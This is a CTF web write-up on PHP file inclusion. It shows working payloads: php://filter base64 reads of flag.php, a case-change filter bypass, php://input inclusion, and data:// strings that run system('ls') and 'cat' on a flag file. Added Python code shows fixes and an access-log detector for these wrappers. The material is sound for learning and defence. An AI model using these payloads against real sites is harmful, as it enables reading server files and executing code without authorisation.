CTF web: file inclusion vulnerabilities (examples)

File inclusion vulnerabilities

The php:// wrapper

Two php:// streams matter here: php://filter and php://input. php://filter is used to read source code, and php://input is used to execute PHP code.

1. php://filter

When it is combined with the include function, the php://filter stream is executed as a PHP file. So we generally base64-encode the stream so that its content is returned instead of executed. This leads to arbitrary file reading:
http://127.0.0.1/cmd.php?file=php://filter/read=convert.base64-encode/resource=index.php


Example: [ACTF2020 Freshman Competition] Include

Look at the URL carefully and notice that it references flag.php; from this we judge that the challenge is a PHP pseudo-protocol question.
Build the payload:

?file=php://filter/read=convert.base64-encode/resource=flag.php

Base64-decode the output.

Example: [BSidesCF 2020] Had a bad day

The php pseudo-protocol allows an extra segment to be nested inside the php://filter chain to bypass the check, read any file, and read flag.php directly:

?category=php://filter/read=convert.base64-encode/woofers/resource=flag

2. php://input

A read-only stream that gives access to the raw body of the request; when it is included, the data in the POST request body is executed as PHP code.

http://127.0.0.1/cmd.php?file=php://input

Example: Web_php_include

0x01 Source code

First, open the challenge; the following PHP code is displayed on the page:

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
// Strip every literal "php://" from the parameter; strstr() and str_replace()
// are both case-sensitive, so only the exact lowercase string is removed.
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

Method 1: the challenge filters with the strstr() function, which is case-sensitive, so the check can be bypassed directly by changing the case of php://.

View the source code.

Method 2: execute commands through the data:// pseudo-protocol

Usage: data://text/plain;base64,xxxx (base64-encoded data)
data://text/plain,<?php system("ls")?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=


data://text/plain,<?php system("cat fl4gisisish3r3.php")?>
data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmw0Z2lzaXNpc2gzcjMucGhwIik/Pg==
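To make the two bypasses above concrete from the defender's side, here is an added example (not code from the original write-up or the challenge) that models the challenge's page filter in Python and contrasts it with a case-insensitive wrapper check and an allowlist loader. The function names (sanitize_vulnerable, is_wrapper_path, resolve_page, compare) and the PAGES table are this example's own assumptions.

```python
"""Added example (not from the original write-up): a Python model of the
challenge's page filter next to an allowlist-based loader. The function names
and the PAGES table are this example's own assumptions."""
import re
from typing import Optional


def sanitize_vulnerable(page: str) -> str:
    """Mirrors the challenge's loop:
        while (strstr($page, "php://")) { $page = str_replace("php://", "", $page); }
    Both functions are case-sensitive, so only the exact lowercase string is
    stripped (nesting such as phpphp://:// is handled by the loop, case is not),
    and wrappers other than php:// are never considered."""
    while "php://" in page:
        page = page.replace("php://", "")
    return page


# Any leading scheme name followed by ':' (php:, data:, ...). PHP resolves
# wrapper names case-insensitively, so the check must be case-insensitive too.
WRAPPER_RE = re.compile(r"^\s*[a-z][a-z0-9+.-]*:", re.IGNORECASE)


def is_wrapper_path(page: str) -> bool:
    """Blocklist-style check that closes the case gap of sanitize_vulnerable()."""
    return WRAPPER_RE.match(page) is not None


# Allowlist: the request names a key; the server, not the client, picks the path.
PAGES = {"index": "pages/index.php", "about": "pages/about.php"}


def resolve_page(page: str) -> Optional[str]:
    """Return the file to include for an allowlisted page name, else None (refuse)."""
    return PAGES.get(page)


def compare(page: str) -> dict:
    """Show what each approach would hand to include() for one request value."""
    return {
        "vulnerable_includes": sanitize_vulnerable(page),
        "blocklist_rejects": is_wrapper_path(page),
        "allowlist_includes": resolve_page(page),
    }


if __name__ == "__main__":
    # Constructed request values covering the write-up's two bypasses.
    for value in ["about", "php://input", "PHP://input",
                  "phpphp://://input", "data://text/plain,<?php echo 1;?>"]:
        print(f"{value!r}: {compare(value)}")
```

The allowlist is the fix to prefer: with resolve_page() the client never supplies a path or a wrapper at all, so neither the case trick nor the data:// wrapper has anything to act on.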


0x02 Summary

1. The functions that cause file inclusion vulnerabilities usually include:
include, require, include_once, require_once, highlight_file, show_source, file_get_contents, fopen, file, readfile
2. data:// protocol
Usage:
data://text/plain,xxxx (the PHP code to be executed)
data://text/plain;base64,xxxx (base64-encoded data)
3. php:// protocol
php://input: used to execute PHP code; the code is submitted as the body of a POST request.
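On the detection side, every wrapper use summarised above except the body of a php://input request leaves a trace in the request line, so an access-log scan catches most of it. The following is an added example (not part of the original write-up) that scans constructed Apache/nginx-style access log lines for query parameters beginning with the php: or data: wrappers, handling case changes and double percent-encoding. The log lines are constructed for this example; the function names (normalize, find_wrapper_params, scan_log) are assumptions.

```python
"""Added example (not from the original write-up): detect php:// and data://
wrapper use in access-log query strings. Log lines are constructed."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Common log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)
# Only the two wrappers discussed in the write-up; the scheme is captured.
WRAPPER_RE = re.compile(r"^\s*(php|data)\s*:", re.IGNORECASE)


def normalize(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so double-encoded values are seen,
    then lower-case, since PHP resolves wrapper names case-insensitively."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.lower()


def find_wrapper_params(target: str):
    """Return [(param, scheme, normalized_value)] for query parameters whose
    value starts with a wrapper. parse_qsl decodes once; normalize() finishes."""
    hits = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = normalize(raw)
        m = WRAPPER_RE.match(value)
        if m:
            hits.append((name, m.group(1), value))
    return hits


def scan_log(lines):
    """Parse each line and collect one alert per wrapper-bearing parameter."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        for param, scheme, value in find_wrapper_params(m["target"]):
            alerts.append({"ip": m["ip"], "ts": m["ts"], "param": param,
                           "scheme": scheme, "value": value})
    return alerts


# Constructed sample log: one benign request, then the write-up's patterns.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2024:12:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "GET /index.php?file=php://filter/read=convert.base64-encode/resource=flag.php HTTP/1.1" 200 1024',
    '203.0.113.7 - - [10/Mar/2024:12:00:03 +0000] "GET /index.php?page=PHP%3A%2F%2Finput HTTP/1.1" 200 88',
    '203.0.113.9 - - [10/Mar/2024:12:00:04 +0000] "GET /index.php?page=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgc3lzdGVtKCJscyIpPz4%3D HTTP/1.1" 200 300',
    '203.0.113.9 - - [10/Mar/2024:12:00:05 +0000] "GET /index.php?page=%2570hp%3A%2F%2Finput HTTP/1.1" 200 88',
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Note the limit: for php://input the PHP payload travels in the POST body, which the access log does not record, so the alert shows only that the wrapper was requested; the body itself is only available from a request-logging proxy or WAF.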


Source: blog.csdn.net/weixin_49298265/article/details/110356100